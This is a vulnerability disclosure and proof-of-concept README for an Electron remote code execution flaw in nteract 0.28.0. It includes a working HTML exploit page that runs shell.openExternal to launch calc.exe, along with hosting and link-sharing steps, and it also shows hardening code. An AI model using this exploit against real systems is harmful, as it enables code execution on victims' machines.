Nteract PoC

A proof of concept for the CVE-2024-22891 vulnerability.

nteract 0.28.0 allows an Electron webview via a Markdown link, with resultant remote code execution.

This repository contains an example vulnerable application and a proof-of-concept (PoC) exploit for it. The PoC is a Python file that automates the process.

1. Vulnerability Overview:

  • Vulnerability Subject: Markdown link RCE
  • Vulnerability Type: Other: Open Redirect
  • Manifestation of the Issue: Electron Webview
  • Affected Component: markdown
  • Attack Type: Remote Code Execution
  • Attack Vectors: To exploit the vulnerability, the victim must click the link or open the shared project's link.
  • Reserved CVE Number: CVE-2024-22891

2. Vulnerability Cause:

  • nteract 0.28.0 allows Electron webview via Markdown link, with resultant remote code execution (because nodeIntegration in webPreferences is true).

  • Exploit explanation

    • When a link is generated through Markdown inside the application, nteract creates an Electron WebView for it, which gives the linked page access to the Electron environment. Consequently, an attacker can achieve Remote Code Execution (RCE) once the victim follows a link to the attacker's server.

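As an added defensive example (not code from the nteract project or this repository), the renderer settings the advisory describes are shown beside a hardened webPreferences object and a main-process navigation guard that refuses anything but http(s) links; the function names and the Electron wiring in `installNavigationGuard` are assumptions, and the policy functions run in plain Node without Electron.

```javascript
// Added example, not nteract's code: an Electron policy for windows that
// render untrusted Markdown. The decision logic is pure so it can be tested
// without Electron installed; only installNavigationGuard touches Electron.

// The configuration the advisory describes: page script can require('electron')
// and call shell.openExternal() directly from a Markdown-generated view.
const weakWebPreferences = {
  nodeIntegration: true,
  contextIsolation: false,
  webviewTag: true,
};

// Hardened counterpart: no Node in the renderer, isolated world, no <webview>
// tag and a sandboxed renderer, so a Markdown link cannot reach shell.openExternal().
const hardenedWebPreferences = {
  nodeIntegration: false,
  contextIsolation: true,
  webviewTag: false,
  sandbox: true,
};

// Only http(s) URLs may leave the app; file:, javascript: and unparsable
// strings are refused, which covers the 'file:C:/...' link used in the PoC.
function isAllowedExternalUrl(href) {
  let parsed;
  try { parsed = new URL(href); } catch (e) { return false; }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:';
}

// Decision for a navigation or window-open request from the notebook window.
function decideNavigation(href) {
  return isAllowedExternalUrl(href) ? 'open-external' : 'deny';
}

// Wiring for the main process (assumed shape: webContents and electron.shell).
// The notebook window itself never navigates; allowed links go to the OS browser.
function installNavigationGuard(contents, shell) {
  contents.on('will-navigate', (event, href) => {
    event.preventDefault();
    if (decideNavigation(href) === 'open-external') shell.openExternal(href);
  });
  contents.setWindowOpenHandler(({ url }) => {
    if (decideNavigation(url) === 'open-external') shell.openExternal(url);
    return { action: 'deny' };
  });
}
```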
Proof-of-concept (POC)

Step 1) The attacker hosts a page whose script launches calc.exe through the openExternal() function:

```html
<html>
<head>
    <title>jruru Link</title>
</head>
<body>
    <a id="jruruLink">jruru Link</a>

    <script>
        // Uses the Electron shell exposed by nodeIntegration to open a local file
        function openExternal() {
            try {
                const { shell } = require('electron');
                shell.openExternal('file:C:/Windows/System32/calc.exe');
            } catch(e) {
                alert('JRURU - External link cannot be opened.');
                console.error(e);
            }
        }
        // Automatically execute openExternal function after the page is loaded
        document.addEventListener('DOMContentLoaded', function() {
            openExternal();
        });
    </script>
</body>
</html>
```

Note: To test quickly, serve the page from the attacker's PC with the following command.

```shell
$ python -m http.server 80
```

Step 2) Run the nteract application on the victim's system and create a Markdown link, or share the attacker's .ipynb file containing the link as example code. Following the link launches calc.exe.

```markdown
[Read This](http://[attacker_address]/shard_data.html)
```


3. Additional Information

When opening a .ipynb file received through file sharing, be cautious, as the link may not be visible. calc.exe stands in for any malicious payload, local or remote, which could give the attacker full access to the victim's system.